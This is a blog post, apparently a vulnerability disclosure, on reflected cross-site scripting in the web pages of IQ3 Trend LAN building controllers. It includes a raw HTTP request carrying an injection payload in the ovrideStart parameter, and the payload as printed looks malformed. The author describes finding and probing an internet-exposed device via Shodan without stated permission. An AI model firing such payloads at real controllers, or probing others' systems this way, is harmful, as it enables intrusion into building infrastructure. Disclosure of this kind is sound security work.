IQ3 Trend LAN Controller – Multiple Reflected XSS

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I saw I poked at one without authentication. By default you are given system guest access which lets you see the status of components. Some of these pages allow for cross site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf”><alert>(‘DF’)</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive


2. Z.htm ovrideStart Parameter Reflected XSS

In addition there are 10 sub pages in the format Z#(W).htm for each of 10 zones. Each of these pages have a reflected XSS in the same parameter:”><alert>(‘DF’)</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS


Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: